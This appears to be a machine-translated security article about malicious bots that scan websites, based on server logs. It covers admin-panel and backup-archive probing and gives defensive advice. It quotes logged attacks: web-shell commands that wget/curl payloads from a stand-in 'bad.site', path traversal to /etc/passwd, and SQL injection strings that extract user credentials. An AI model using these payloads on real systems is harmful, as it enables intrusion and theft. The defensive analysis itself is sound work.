What and why are they looking for “dark side power bots” on sites

What are the “dark side bots” ? Let us designate the scanning programs (search robots, spiders) that are used by cybercriminals. Unlike search engine robots [1, 2], “bots of the dark side of the force” (hereinafter referred to as bots for short) are searching for vulnerabilities, malicious software bookmarks, confidential information, etc. Actions similar to the work of a bot can be performed by people, but the use of the bot, for obvious reasons, is more efficient and more common.

In preparing the material used logs (web servers and content management systems) of several sites. The most typical and most illustrative examples are selected.

What and why are they looking for?

Admin panel

Administrative panel, control panel or “admin panel” is one of the most common goals. Tasks: determine the used CMS, set the exact address of the panel script for further password selection.

Examples (for CMS WordPress [3]):

example.org/wp-login.php (check "on the forehead")
example.org/wp-admin (sorted through typical directories)
example.org/dir/dir/wp-login. php (iterates over all available directories)
example.org/wp-admin/images/wordpress-logo.png (an attempt to mask the scan when not the script itself is checked, but a characteristic image or css file)

Such a scan is carried out constantly and should not bother you much, especially if you are not using WordPress CMS, as in the above example. As a countermeasure, it is advisable to restrict access to the directory with scripts of the administrative panel using the web server (.htaccess and .htpasswd for Apache), without forgetting the mandatory password strength in the CMS used.

As can be seen from these examples, attempts are being made to find not only the CMS administrative panels, but also auxiliary systems or applications for administration. Various script and directory names are sorted out, including the most common version suffixes. Some administrators believe that by changing the name of the script or directory (while maintaining the readability and clarity of the name), they will be able to outwit the bots and protect the system. Unfortunately, this is far from the case.

Featured Archives

Archives with backups or installation packages are valuable prey for attackers, because they can contain passwords for access to the administrative panel, files with settings, parameters for access to the DBMS, full copies of databases, etc.


example.org/example .org.tar.gz
example.org/dir /dir.zip

Please note that many archivers, including installed on the servers of hosting companies, set the default name of the archive file equal to the directory that is archived or in which the data intended for archiving is located. This feature is widely used by bots, as can be seen from the examples above.
Sometimes you may encounter attempts to select archive file names from common backup systems. When using a typical algorithm for generating file names and update release dates, the number of combinations is significantly reduced. Despite the fact that some backup systems have built-in protection mechanisms (such as .htaccess with "deny from all"), they may not be effective when changing the web server and for some other reasons.

It is advisable to quickly delete files with archives that contain important or confidential information, since they are constantly in the area of ​​interest of bots.


When identifying suspicious complaints in the process of analyzing the logs, the administrator has a desire to better understand the situation. This is what attackers are guided by.

From the logs, it is usually possible to restore the value of the HTTP referer field. The client (bot) can set this field arbitrarily, so the administrator should exercise some caution when handling the received data. Possible options: a link to a phishing site or a site with malware, an advertising link, executing a script compressed by a link reduction system.

It’s better not to consider the value of the HTTP referer field as reliable information and if you really want to click on the link, check the link on the sites of anti-virus companies and VirusTotoal first.

Everyone should know and understand this, but recall that it is strictly forbidden to click on unknown links, especially when you are working on a server with administrator privileges.
Examples of links, for obvious reasons, will not be given.

"Magic" catalogs

What directories (subsections) are used most often by bots? We give examples without additional comments, focusing only on the relative frequency. It should immediately be noted that the selection depends on the sites examined and the inclusion (exclusion) of the directories used to search for administrative panels.

Malicious software bookmarks

Let's look at some examples first:

example.org/images/stories/busuk.inc. php

The files listed above should not be present on [research] sites. If you have a sufficiently large sample from several sites, then you can highlight such targeted attempts. Check out additional examples illustrating the use of such scripts by cybercriminals:

example.org/images/stories/racrew.php?cmd=wget  http://bad.site/img/icons/tempe.gif; mv tempe.gif menu.php
example.org/naskleng.php?cmd=wget  http://bad.site/components/com_content/teli.tar.gz; curl -O http://bad.site/components/com_content/teli.tar.gz; lwp-download http: //bad.site...

Where do they come from? As a rule, everything is banal: warez or hacking (through outdated and not updated on time CMS or components, etc.).

Ageless classic - SQL injection and directory navigation

We restrict ourselves to examples without detailed reasoning about what it should be and how it should work, as intended by the authors.

example.org/index.php?option=../../../../../../../../../../etc/passwd \ 0 & sitemap = 1
example.org /index.php?option=/../../../../../../../../../../proc/self/environ&sitemap=1
example.org/index .php? option = com_ignitegallery & task = view & gallery = -1 + union + select + 1 , 2, concat (1234.0x3B, 4321), 4,5,6,7,8,9,10--
example.org/index. php? option = com_kunena & func = userlist & search = \ "%" and 1 = 2) union select 1, concat (username, 0x3a, password, 0x3a, usertype), concat (username, 0x3a, password, 0x3a, usertype), "Super Administrator "," Email ", ...
example.org/index.php?option=com_linx&Itemid=101 " and (select / ** / 1 / ** / from (select / ** / count (*), concat ((select / ** / username / ** / from / ** / jos_users / ** / where / ** / usertype = 0x73757065722061646d696e6973747261746f72 ...
example.org/index.php?option=com_rsfiles&view=files&layout=agreement&tmpl=component&cid=1 ** / aNd / ** / 1 = 0 / ** / uNioN ++ sElecT + 1.234567--
example.org/index. php /? option = com_rsfiles & view = files & layout = agreement & tmpl = component & cid = -1 + union + select + 1 , concat (0x7e, table_name, 0x7e) + from + information_schema.tables + where + table_name = 0x4348415241435445525f53455453--

Instead of a conclusion

Watch and analyze logs of operating systems (not just web). This may come in handy at the most inopportune moment.
Homework [Homebrew] do-it-yourself web honeypot .

Also popular now: